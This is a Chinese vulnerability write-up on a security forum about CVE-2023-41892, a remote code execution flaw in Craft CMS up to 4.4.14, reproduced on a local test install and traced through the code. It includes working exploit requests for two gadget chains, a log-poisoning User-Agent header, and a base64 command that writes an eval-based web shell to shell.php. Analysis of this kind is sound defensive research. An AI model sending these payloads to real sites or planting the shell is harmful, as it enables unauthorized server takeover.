奇安信攻防社区-Craft CMS远程代码执行漏洞

Craft CMS远程代码执行漏洞

# Craft CMS远程代码执行漏洞 ## 漏洞简介 **漏洞编号：CVE-2023-41892** Craft CMS是一个创建数字体验的平台。这是一种高影响、低复杂性的攻击媒介。建议在 4.4.15 之前运行 Craft 安...

Craft CMS远程代码执行漏洞
=================

漏洞简介
----

**漏洞编号：CVE-2023-41892**

Craft CMS是一个创建数字体验的平台。这是一种高影响、低复杂性的攻击媒介。建议在 4.4.15 之前运行 Craft 安装的用户至少更新到该版本以缓解此问题。Craft CMS&lt;4.4.15 版本存在远程代码执行 （RCE）漏洞，攻击者通过在受攻击系统上执行恶意命令，从而获取未授权的系统访问权限。此问题已在 4.4.15 中修复。

影响版本
----

4.0.0-RC1 &lt;= Craft CMS &lt;= 4.4.14

环境搭建
----

> 测试工具：phpstudy+vscode，测试版本：Craft CMS4.4.14 + php8.0.2 + MySQL5.7.26

源码链接：`https://github.com/craftcms/cms/releases/`

打开phpstudy创建网站以及数据库

![image-20240902201223309.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-79a57e028be567ae59484c6d769c99c2a4cfab3d.png)

把下载的源码复制到网站对应根目录下，打开整个项目文件夹

然后打开composer

![image-20240902201850168.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-3e264faa7d259492d50340c0cd949ba19bffc504.png)

执行以下命令

```php
php craft setup
```

不过出现报错，找不到类

![image-20240902202252956.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-68ab2c26712aafac71dd03681b0576b03a19c6c5.png)

打开php.ini配置文件添加以下内容即可

```php
extension=php\_intl.dll
```

继续安装，输入配置数据库信息以及用户名（xdebug的问题忽略）

访问`http://craftcms/web/index.php`，搭建成功

![image-20240902202642408.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-2f25a1ebc82cf7e0c8c21550c9a13d25a4f8da9b.png)

漏洞利用
----

### FnStream类

> 全局搜索`__construct()`进行查找，最终在FnStream类找到，并且`call_user_func()`可控

#### 漏洞复现

POST传参

```php
action=conditions/render&configObject=craft\\elements\\conditions\\ElementCondition&config={"name":"configObject","as ":{"class":"\\\\GuzzleHttp\\\\Psr7\\\\FnStream","\_\_construct()":\[{"close":null}\],"\_fn\_close":"phpinfo"}}
```

执行结果如下

![image-20240903154331447.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-e1209b7fb4fa6177c9519028745b975211ab03ae.png)

#### 漏洞分析

我们查看官方报告，补丁文件在`src/controllers/ConditionsController.php`的`beforeAction()`方法

![image-20240903153631438.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-7d04cbd95d3b86a607ac0a5f1eb6cb517021fa2e.png)

首先接收请求参数config并对json数据解码，然后把name键名的值赋值给`$config`

然后调用ArrayHelper类的`remove()`方法，我们跟进一下发现最终是继承的`BaseArrayHelper`类，`remove()`方法移除new-rule-type的元素，接着调用`getConditions()`方法获取条件服务对象，再调用`createCondition()`方法创建条件对象

![image-20240903163348346.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-fa8633a294d258390986d248295264e326c53dd6.png)

再第42行下断点一步步调试，这里传进去的参数分别为ElementCondition类和恶意代码数组

![image-20240903164144044.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-8ea76910e6f72c693f377e160a2b2b6b29f60c5d.png)

跟进一下，这里foreach遍历`$properties`数组给`$object`对象属性赋值（即ElementCondition类）

```php
public static function configure($object, $properties)  
{  
    foreach ($properties as $name \=> $value) {  
        $object\->$name \= $value;  
    }  
  
    return $object;  
}
```

先为`$name` 和`$value`赋完值，然后由于不存在as键名，那么给不存在的属性赋值就会触发`__set()`魔术方法，我们往上查找ElementCondition类是继承哪个父类

```php
ElementCondition -> BaseCondition -> Component
```

最终在`\vendor\yiisoft\yii2\base\Component.php`找到`__set()`方法

![image-20240903203851372.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-692c7e199fd5f7951ecbaa853edb2d84028e6e06.png)

这里将as与set拼接后不存在此方法，由于属性名为as直接进入到第188行的elseif语句。然后如果 `$value` 是一个 `Behavior` 实例，直接使用；否则调用 `Yii::createObject()` 方法创建实例，跟进一下

![image-20240903205612642.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-ef69934461c2996fa0ad5c51a942bad0c79d0b9d.png)

直接看向第362行，这里将class键名就赋值给`$class`然后删除数组中的class键，继续调用`Container::get()`方法

![image-20240903211917554.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-dc640ad0de54fda5d8b645e18ddc51610c6a3c4d.png)

由于FnStream类不是Instance类的子类，并且不存在`$_singletons[$class]`键，所以进入elseif语句调用`build()`方法

![image-20240903221718543.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-41ffbb3b63bb1ab3e5f8af0591e838958071f355.png)

这里先调用`getDependencies()`方法，继续跟进

![image-20240903221758762.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-47545b79df7a415e1b6571b38ab379f906be99da.png)

`_reflections`类的键不存在该类，执行try语句对FnStream类实例化。往下看然后调用`getConstructor()`方法，最后return返回值

![image-20240903222729094.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-d20752be1d0c08b659d2ea6eed388f077f190c9a.png)

回到`Container::build()`，如果存在`__construct()`键，赋值给`$addDependencies`然后删除。往下跟进到第422行

```php
$object = $reflection->newInstanceArgs($dependencies);
```

调用`newInstanceArgs()`实例化（即是FnStream类），继续跟进

![image-20240904000055673.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-2852e8a67fa5100e3d41650712a53fd668235484.png)

遍历`$methods`数组，将`$name`与`_fn_`进行拼接，使得FnStream类出现`_fn_close`属性并且值为null

回到`build()`方法，遍历数组config数组赋值，返回object对象

![image-20240904000406273.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-b635f37762d2a54c99e7a663a912e5562524a6d0.png)

一步步调试跟进，最后调用`__destruct()`魔术方法，由于存在`$_fn_close`属性成功执行phpinfo

![image-20240904000447823.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-ef317603db3fa72cc1fd8763c0ac0dc5603db188.png)

### PhpManager类

> POP链跟的前面部分和利用FnStream类的链差不多，都是经过以下部分去实例化类，区别在于利用的类不同
> 
> ConditionsController::beforeAction() -&gt; Component::\_\_set() -&gt; Container::get() -&gt; Container::build()

#### 漏洞复现

先利用hackbar写入恶意代码到日志文件

```php
User-Agent: <?php phpinfo();?>
```

然后日志文件包含即可

```php
action=conditions/render&configObject=craft\\elements\\conditions\\ElementCondition&config={"name":"configObject","as ":{"class":"\\\\yii\\\\rbac\\\\PhpManager","\_\_construct()":\[{"assignmentFile":"D:/phpstudy\_pro/WWW/craftcms/storage/logs/web-2024-09-04.log"}\]}}
```

![image-20240904220349458.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-ff08dd7f5335b4e799bd25839b5453a55aaabdf8.png)

注意这里的`assignmentFile`是PhpManager类的属性，换成其他属性也行。还有就是需要完整日志路径，不然会报错。进一步利用的话由于单双引号会被反斜杠转义，考虑直接使用反引号命令执行

```php
User-Agent: <?php \`echo PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=|base64 -d > shell.php\`;?>
```

#### 漏洞分析

前面链子一样我们就不分析了，直接跟进到Container::getDependencies()`的第507行

![image-20240905215531196.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-30767a2f38868dbefa98b542708e6cddcf5ae733.png)

`$class`值为`\yii\rbac\PhpManager`，所以进行实例化PhpManager类

调用`init()`方法初始化

```php
public function init()  
{  
    parent::init();  
    $this\->itemFile \= Yii::getAlias($this\->itemFile);  
    $this\->assignmentFile \= Yii::getAlias($this\->assignmentFile);  
    $this\->ruleFile \= Yii::getAlias($this\->ruleFile);  
    $this\->load();  
}
```

这里出现了`load()`方法，跟进一下

![image-20240905215758627.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-65db8a7a535c018cda6b7a8c9d9c9b099799ec48.png)

定义了空数组，然后调用`loadFromFile()`并传参进行赋值，继续跟进

```php
protected function loadFromFile($file)  
{  
    if (is\_file($file)) {  
        return require $file;  
    }  
  
    return \[\];  
}
```

对传进来的文件进行判断，文件包含并返回执行结果

我们ctrl加左键查看下传进去的参数，发现都可控那么就可以尝试进行包含恶意代码

![image-20240905220150968.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-eecb3a1e7dda02e581bdee8544b8c2d72ddc09ee.png)

哪些文件可以被我们注入恶意代码并且用来文件包含呢，我们查看下官方文档，注意到在目录`storage/logs/`下存在文件`web-[Y-m-d].log`，按照年月日命名并且里面存储了web的请求内容，我们直接包含这个文件即可实现RCE

![image-20240905220430602.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-c858e86617915f09168a4d725aa10c2fa91fc498.png)

发表于 2024-09-10 08:30:02
阅读 ( 861 )
分类：CMS

Craft CMS远程代码执行漏洞

0 条评论